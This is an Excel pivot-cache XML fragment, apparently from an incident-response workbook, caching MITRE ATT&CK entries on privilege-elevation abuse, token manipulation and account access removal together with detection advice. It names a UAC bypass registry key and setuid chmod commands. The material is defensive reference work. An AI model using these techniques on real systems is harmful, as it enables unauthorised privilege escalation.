    <cacheHierarchy uniqueName="[MT].[data sources]" caption="data sources" attribute="1" defaultMemberUniqueName="[MT].[data sources].[All]" allUniqueName="[MT].[data sources].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[is sub-technique]" caption="is sub-technique" attribute="1" defaultMemberUniqueName="[MT].[is sub-technique].[All]" allUniqueName="[MT].[is sub-technique].[All]" dimensionUniqueName="[MT]" displayFolder="" count="2" memberValueDatatype="11" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[sub-technique of]" caption="sub-technique of" attribute="1" defaultMemberUniqueName="[MT].[sub-technique of].[All]" allUniqueName="[MT].[sub-technique of].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[contributors]" caption="contributors" attribute="1" defaultMemberUniqueName="[MT].[contributors].[All]" allUniqueName="[MT].[contributors].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[permissions required]" caption="permissions required" attribute="1" defaultMemberUniqueName="[MT].[permissions required].[All]" allUniqueName="[MT].[permissions required].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[defenses bypassed]" caption="defenses bypassed" attribute="1" defaultMemberUniqueName="[MT].[defenses bypassed].[All]" allUniqueName="[MT].[defenses bypassed].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[supports remote]" caption="supports remote" attribute="1" defaultMemberUniqueName="[MT].[supports remote].[All]" allUniqueName="[MT].[supports remote].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="11" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Hostname]" caption="Hostname" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Hostname].[All]" allUniqueName="[SystemOfInterest].[Hostname].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Date Added]" caption="Date Added" attribute="1" time="1" defaultMemberUniqueName="[SystemOfInterest].[Date Added].[All]" allUniqueName="[SystemOfInterest].[Date Added].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="7" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Added by]" caption="Added by" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Added by].[All]" allUniqueName="[SystemOfInterest].[Added by].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Domain]" caption="Domain" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Domain].[All]" allUniqueName="[SystemOfInterest].[Domain].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[OS]" caption="OS" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[OS].[All]" allUniqueName="[SystemOfInterest].[OS].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[IPv4 Address]" caption="IPv4 Address" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[IPv4 Address].[All]" allUniqueName="[SystemOfInterest].[IPv4 Address].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Function]" caption="Function" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Function].[All]" allUniqueName="[SystemOfInterest].[Function].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Status]" caption="Status" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Status].[All]" allUniqueName="[SystemOfInterest].[Status].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Evidence Available]" caption="Evidence Available" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Evidence Available].[All]" allUniqueName="[SystemOfInterest].[Evidence Available].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Reason to be Added [eg why evidence collected]]]" caption="Reason to be Added [eg why evidence collected]" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Reason to be Added [eg why evidence collected]]].[All]" allUniqueName="[SystemOfInterest].[Reason to be Added [eg why evidence collected]]].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Main Analyst]" caption="Main Analyst" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Main Analyst].[All]" allUniqueName="[SystemOfInterest].[Main Analyst].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[System tracking sheet completed]" caption="System tracking sheet completed" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[System tracking sheet completed].[All]" allUniqueName="[SystemOfInterest].[System tracking sheet completed].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Owned by Compromised Account]" caption="Owned by Compromised Account" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Owned by Compromised Account].[All]" allUniqueName="[SystemOfInterest].[Owned by Compromised Account].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Notes]" caption="Notes" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Notes].[All]" allUniqueName="[SystemOfInterest].[Notes].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Location]" caption="Location" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Location].[All]" allUniqueName="[SystemOfInterest].[Location].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Earliest Evidence of Compromise]" caption="Earliest Evidence of Compromise" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Earliest Evidence of Compromise].[All]" allUniqueName="[SystemOfInterest].[Earliest Evidence of Compromise].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Data Available]" caption="Data Available" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Data Available].[All]" allUniqueName="[SystemOfInterest].[Data Available].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Analysis Status]" caption="Analysis Status" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Analysis Status].[All]" allUniqueName="[SystemOfInterest].[Analysis Status].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Priority]" caption="Priority" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Priority].[All]" allUniqueName="[SystemOfInterest].[Priority].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Reporting Level]" caption="Reporting Level" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Reporting Level].[All]" allUniqueName="[SystemOfInterest].[Reporting Level].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[In Timeline?]" caption="In Timeline?" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[In Timeline?].[All]" allUniqueName="[SystemOfInterest].[In Timeline?].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[source ID]" caption="source ID" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[source ID].[All]" allUniqueName="[Table_techniques_addressed].[source ID].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[source name]" caption="source name" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[source name].[All]" allUniqueName="[Table_techniques_addressed].[source name].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[source type]" caption="source type" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[source type].[All]" allUniqueName="[Table_techniques_addressed].[source type].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[mapping type]" caption="mapping type" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[mapping type].[All]" allUniqueName="[Table_techniques_addressed].[mapping type].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[target ID]" caption="target ID" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[target ID].[All]" allUniqueName="[Table_techniques_addressed].[target ID].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[target name]" caption="target name" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[target name].[All]" allUniqueName="[Table_techniques_addressed].[target name].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[target type]" caption="target type" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[target type].[All]" allUniqueName="[Table_techniques_addressed].[target type].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[mapping description]" caption="mapping description" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[mapping description].[All]" allUniqueName="[Table_techniques_addressed].[mapping description].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[source ID]" caption="source ID" attribute="1" defaultMemberUniqueName="[techniques addressed].[source ID].[All]" allUniqueName="[techniques addressed].[source ID].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[source name]" caption="source name" attribute="1" defaultMemberUniqueName="[techniques addressed].[source name].[All]" allUniqueName="[techniques addressed].[source name].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[source type]" caption="source type" attribute="1" defaultMemberUniqueName="[techniques addressed].[source type].[All]" allUniqueName="[techniques addressed].[source type].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[mapping type]" caption="mapping type" attribute="1" defaultMemberUniqueName="[techniques addressed].[mapping type].[All]" allUniqueName="[techniques addressed].[mapping type].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[target ID]" caption="target ID" attribute="1" defaultMemberUniqueName="[techniques addressed].[target ID].[All]" allUniqueName="[techniques addressed].[target ID].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[target name]" caption="target name" attribute="1" defaultMemberUniqueName="[techniques addressed].[target name].[All]" allUniqueName="[techniques addressed].[target name].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[target type]" caption="target type" attribute="1" defaultMemberUniqueName="[techniques addressed].[target type].[All]" allUniqueName="[techniques addressed].[target type].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[mapping description]" caption="mapping description" attribute="1" defaultMemberUniqueName="[techniques addressed].[mapping description].[All]" allUniqueName="[techniques addressed].[mapping description].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Date/Time (UTC)]" caption="Date/Time (UTC)" attribute="1" time="1" defaultMemberUniqueName="[Timeline].[Date/Time (UTC)].[All]" allUniqueName="[Timeline].[Date/Time (UTC)].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="7" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Notable Event]" caption="Notable Event" attribute="1" defaultMemberUniqueName="[Timeline].[Notable Event].[All]" allUniqueName="[Timeline].[Notable Event].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Date added]" caption="Date added" attribute="1" defaultMemberUniqueName="[Timeline].[Date added].[All]" allUniqueName="[Timeline].[Date added].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Added by]" caption="Added by" attribute="1" defaultMemberUniqueName="[Timeline].[Added by].[All]" allUniqueName="[Timeline].[Added by].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Hostname (from evidence)]" caption="Hostname (from evidence)" attribute="1" defaultMemberUniqueName="[Timeline].[Hostname (from evidence)].[All]" allUniqueName="[Timeline].[Hostname (from evidence)].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Src hostname]" caption="Src hostname" attribute="1" defaultMemberUniqueName="[Timeline].[Src hostname].[All]" allUniqueName="[Timeline].[Src hostname].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Src Account]" caption="Src Account" attribute="1" defaultMemberUniqueName="[Timeline].[Src Account].[All]" allUniqueName="[Timeline].[Src Account].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Dst hostname/IP]" caption="Dst hostname/IP" attribute="1" defaultMemberUniqueName="[Timeline].[Dst hostname/IP].[All]" allUniqueName="[Timeline].[Dst hostname/IP].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Dst Account]" caption="Dst Account" attribute="1" defaultMemberUniqueName="[Timeline].[Dst Account].[All]" allUniqueName="[Timeline].[Dst Account].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Event Type]" caption="Event Type" attribute="1" defaultMemberUniqueName="[Timeline].[Event Type].[All]" allUniqueName="[Timeline].[Event Type].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Artifact source]" caption="Artifact source" attribute="1" defaultMemberUniqueName="[Timeline].[Artifact source].[All]" allUniqueName="[Timeline].[Artifact source].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Event ID]" caption="Event ID" attribute="1" defaultMemberUniqueName="[Timeline].[Event ID].[All]" allUniqueName="[Timeline].[Event ID].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Description]" caption="Description" attribute="1" defaultMemberUniqueName="[Timeline].[Description].[All]" allUniqueName="[Timeline].[Description].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[ATT&amp;CK Technique]" caption="ATT&amp;CK Technique" attribute="1" defaultMemberUniqueName="[Timeline].[ATT&amp;CK Technique].[All]" allUniqueName="[Timeline].[ATT&amp;CK Technique].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="2" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[ATT&amp;CK Subtechnique]" caption="ATT&amp;CK Subtechnique" attribute="1" defaultMemberUniqueName="[Timeline].[ATT&amp;CK Subtechnique].[All]" allUniqueName="[Timeline].[ATT&amp;CK Subtechnique].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="2" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Notes]" caption="Notes" attribute="1" defaultMemberUniqueName="[Timeline].[Notes].[All]" allUniqueName="[Timeline].[Notes].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count Evidence]" caption="__XL_Count Evidence" measure="1" displayFolder="" measureGroup="Evidence" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count SystemOfInterest]" caption="__XL_Count SystemOfInterest" measure="1" displayFolder="" measureGroup="SystemOfInterest" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count MT]" caption="__XL_Count MT" measure="1" displayFolder="" measureGroup="MT" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count techniques addressed]" caption="__XL_Count techniques addressed" measure="1" displayFolder="" measureGroup="techniques addressed" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count Table_techniques_addressed]" caption="__XL_Count Table_techniques_addressed" measure="1" displayFolder="" measureGroup="Table_techniques_addressed" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count Timeline]" caption="__XL_Count Timeline" measure="1" displayFolder="" measureGroup="Timelin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8923110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2">
  <r>
    <s v="T1548"/>
    <x v="0"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1548"/>
    <d v="2020-01-30T00:00:00"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1548.002"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1548/002"/>
    <d v="2020-01-30T00:00:00"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="2"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:_x000a__x000a_* The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key.(Citation: enigma0x3 Fileless UAC Bypass)_x000a__x000a_*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_x000a__x000a_Analysts should monitor these Registry settings for unauthorized changes."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1548"/>
    <s v="Casey Smith; Stefan Kanthak"/>
    <s v="Administrator, User"/>
    <s v="Windows User Account Control"/>
    <m/>
  </r>
  <r>
    <s v="T1548.004"/>
    <x v="2"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1548/004"/>
    <d v="2020-01-30T00:00:00"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="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
    <s v="macOS"/>
    <s v="Process: OS API Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1548"/>
    <s v="Erika Noerenberg, @gutterchurl, Carbon Black; Jimmy Astle, @AstleJimmy, Carbon Black"/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1548.001"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an &quot;s&quot; instead of an &quot;x&quot; when viewing a file's attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;chmod&lt;/code&gt; program can set these bits with via bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;._x000a__x000a_Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware)."/>
    <s v="https://attack.mitre.org/techniques/T1548/001"/>
    <d v="2020-01-30T00:00:00"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set."/>
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Metadata, File: File Modification"/>
    <b v="1"/>
    <s v="T1548"/>
    <m/>
    <s v="User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1548.003"/>
    <x v="4"/>
    <s v="Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges._x000a__x000a_Within Linux and MacOS systems, sudo (sometimes referred to as &quot;superuser do&quot;) allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The &lt;code&gt;sudo&lt;/code&gt; command &quot;allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.&quot;(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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1548/003"/>
    <d v="2020-01-30T00:00:00"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="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s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Modification, Process: Process Creation, Process: Process Metadata"/>
    <b v="1"/>
    <s v="T1548"/>
    <m/>
    <s v="User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1134"/>
    <x v="5"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1134"/>
    <d v="2017-12-14T00:00:00"/>
    <d v="2021-04-24T00:00:00"/>
    <n v="2"/>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If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. _x000a__x000a_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_x000a__x000a_Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)_x000a__x000a_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
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata"/>
    <b v="0"/>
    <m/>
    <s v="Jared Atkinson, @jaredcatkinson; Robby Winchester, @robwinchester3; Tom Ueltschi @c_APT_ure; Travis Smith, Tripwire"/>
    <s v="Administrator, User"/>
    <s v="File system access controls, Heuristic Detection, Host forensic analysis, System access controls, Windows User Account Control"/>
    <m/>
  </r>
  <r>
    <s v="T1134.002"/>
    <x v="6"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1134/002"/>
    <d v="2020-02-18T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1"/>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If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior._x000a__x000a_Analysts can also monitor for use of Windows APIs such as &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1134"/>
    <m/>
    <m/>
    <s v="File system access controls, System access controls, Windows User Account Control"/>
    <m/>
  </r>
  <r>
    <s v="T1134.003"/>
    <x v="7"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1134/003"/>
    <d v="2020-02-18T00:00:00"/>
    <d v="2020-02-18T00:00:00"/>
    <n v="1"/>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If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior._x000a__x000a_Analysts can also monitor for use of Windows APIs such as &lt;code&gt;LogonUser&lt;/code&gt; and &lt;code&gt; SetThreadToken&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1134"/>
    <m/>
    <s v="Administrator, User"/>
    <s v="File system access controls, System access controls, Windows User Account Control"/>
    <m/>
  </r>
  <r>
    <s v="T1134.004"/>
    <x v="8"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1134/004"/>
    <d v="2020-02-18T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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
    <s v="Windows"/>
    <s v="Process: OS API Execution, Process: Process Creation, Process: Process Metadata"/>
    <b v="1"/>
    <s v="T1134"/>
    <s v="Wayne Silva, F-Secure Countercept"/>
    <s v="Administrator, User"/>
    <s v="Heuristic Detection, Host forensic analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1134.005"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1134/005"/>
    <d v="2020-02-18T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Monitor for Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)"/>
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Object Modification, Process: OS API Execution, User Account: User Account Metadata"/>
    <b v="1"/>
    <s v="T1134"/>
    <s v="Alain Homewood, Insomnia Security; Vincent Le Toux"/>
    <s v="Administrator, SYSTEM"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1134.001"/>
    <x v="10"/>
    <s v="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_x000a__x000a_An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system."/>
    <s v="https://attack.mitre.org/techniques/T1134/001"/>
    <d v="2020-02-18T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1"/>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
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1134"/>
    <m/>
    <m/>
    <s v="File system access controls, System access controls, Windows User Account Control"/>
    <m/>
  </r>
  <r>
    <s v="T1531"/>
    <x v="11"/>
    <s v="Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts._x000a__x000a_Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)"/>
    <s v="https://attack.mitre.org/techniques/T1531"/>
    <d v="2019-10-09T00:00:00"/>
    <d v="2020-07-14T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
